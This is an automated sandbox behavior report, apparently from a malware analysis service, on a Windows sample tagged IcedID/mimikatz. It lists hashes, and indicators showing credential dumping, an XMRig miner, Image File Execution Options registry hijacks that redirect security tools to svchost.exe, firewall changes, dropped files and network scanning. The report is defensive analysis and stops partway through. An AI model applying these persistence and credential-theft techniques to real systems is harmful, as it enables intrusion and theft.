Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2024 05:09
Behavioral task
behavioral1
Sample
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
9b11a4290496c5074abbe32a0baf7bb2
-
SHA1
1632e14ee8e135debeb9228a909e85eb06ab9515
-
SHA256
46c227cd4bb2dda53d44a35499597be98825be9c953b9d8642b3fe9a55229000
-
SHA512
50f79886447f6b294214a428a52b5c32f05114ebc18e7b1b95e58ee5fc864aec69a1b0e5366cba9b61bf20aa8d2a63f372f16b3236cb5800f7ccc61f6785a236
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
lebulsi.exedescription pid Process procid_target PID 348 created 1776 348 lebulsi.exe 37 -
Contacts a large (28969) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/1240-179-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-183-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-200-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-217-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-223-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-235-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-250-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-257-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-368-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-374-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-375-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig behavioral2/memory/1240-377-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4928-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4928-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023ca8-6.dat mimikatz behavioral2/memory/3224-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1808-138-0x00007FF72CCF0000-0x00007FF72CDDE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
lebulsi.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts lebulsi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts lebulsi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
lebulsi.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe lebulsi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3188 netsh.exe 696 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
lebulsi.exelebulsi.exewpcap.exebdltnuisb.exevfshost.exesadefbibf.exexohudmc.exewooakm.exeuuetgf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exelebulsi.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exeysesbhsym.exelebulsi.exepid Process 3224 lebulsi.exe 348 lebulsi.exe 4128 wpcap.exe 1580 bdltnuisb.exe 1808 vfshost.exe 1828 sadefbibf.exe 2788 xohudmc.exe 1072 wooakm.exe 1240 uuetgf.exe 2368 sadefbibf.exe 3608 sadefbibf.exe 3216 sadefbibf.exe 3908 sadefbibf.exe 1940 sadefbibf.exe 2036 sadefbibf.exe 4368 sadefbibf.exe 3192 sadefbibf.exe 1452 sadefbibf.exe 1632 sadefbibf.exe 4520 lebulsi.exe 2176 sadefbibf.exe 2212 sadefbibf.exe 1616 sadefbibf.exe 1416 sadefbibf.exe 2036 sadefbibf.exe 3692 sadefbibf.exe 2348 sadefbibf.exe 1268 ysesbhsym.exe 7036 lebulsi.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebdltnuisb.exepid Process 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 4128 wpcap.exe 1580 bdltnuisb.exe 1580 bdltnuisb.exe 1580 bdltnuisb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 78 ifconfig.me 79 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exelebulsi.exexohudmc.exedescription ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content lebulsi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF lebulsi.exe File created C:\Windows\SysWOW64\wooakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\wooakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies lebulsi.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF lebulsi.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023d09-136.dat upx behavioral2/memory/1808-135-0x00007FF72CCF0000-0x00007FF72CDDE000-memory.dmp upx behavioral2/memory/1808-138-0x00007FF72CCF0000-0x00007FF72CDDE000-memory.dmp upx behavioral2/files/0x0007000000023d14-141.dat upx behavioral2/memory/1828-142-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1828-146-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/files/0x0007000000023d11-163.dat upx behavioral2/memory/1240-164-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/2368-172-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/3608-176-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-179-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/3216-181-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-183-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/3908-186-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1940-190-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/2036-194-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/4368-198-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-200-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/3192-203-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1452-207-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1632-211-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-217-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/2176-220-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-223-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/2212-225-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1616-229-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1416-232-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/2036-234-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-235-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/3692-236-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/2348-238-0x00007FF704570000-0x00007FF7045CB000-memory.dmp upx behavioral2/memory/1240-250-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/1240-257-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/1240-368-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/1240-374-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/1240-375-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx behavioral2/memory/1240-377-0x00007FF642AD0000-0x00007FF642BF0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
lebulsi.execmd.exe2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exeysesbhsym.exedescription ioc Process File created C:\Windows\zthyliniv\eftbbbiir\wpcap.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\libxml2.dll lebulsi.exe File opened for modification C:\Windows\seumlgyb\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\exma-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\trfo-2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\Shellcode.ini lebulsi.exe File opened for modification C:\Windows\zthyliniv\Corporate\log.txt cmd.exe File created C:\Windows\zthyliniv\UnattendGC\specials\crli-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\xdvl-0.dll lebulsi.exe File created C:\Windows\seumlgyb\schoedcl.xml lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\ip.txt lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\Packet.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\schoedcl.xml lebulsi.exe File created C:\Windows\seumlgyb\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\mimilib.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\ssleay32.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\docmicfg.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\schoedcl.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\spoolsrv.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\vimpcsvc.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\mimidrv.sys lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\coli-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\libeay32.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\spoolsrv.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\vimpcsvc.exe lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\cnli-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\vimpcsvc.xml lebulsi.exe File created C:\Windows\seumlgyb\vimpcsvc.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\AppCapture64.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\AppCapture32.dll lebulsi.exe File created C:\Windows\ime\lebulsi.exe lebulsi.exe File opened for modification C:\Windows\seumlgyb\lebulsi.exe 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe File created C:\Windows\zthyliniv\UnattendGC\specials\svschost.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\docmicfg.xml lebulsi.exe File opened for modification C:\Windows\zthyliniv\eftbbbiir\Result.txt ysesbhsym.exe File created C:\Windows\zthyliniv\UnattendGC\specials\posh-0.dll lebulsi.exe File created C:\Windows\seumlgyb\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\tucl-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\zlib1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\schoedcl.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\svschost.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\schoedcl.xml lebulsi.exe File created C:\Windows\seumlgyb\lebulsi.exe 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe File created C:\Windows\zthyliniv\eftbbbiir\wpcap.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\trch-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\spoolsrv.xml lebulsi.exe File created C:\Windows\seumlgyb\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\scan.bat lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\tibe-2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\svschost.xml lebulsi.exe File opened for modification C:\Windows\zthyliniv\eftbbbiir\Packet.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\ucl.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\vimpcsvc.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\vfshost.exe lebulsi.exe File created C:\Windows\zthyliniv\upbdrjv\swrpwe.exe lebulsi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 3076 sc.exe 3016 sc.exe 1472 sc.exe 5088 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
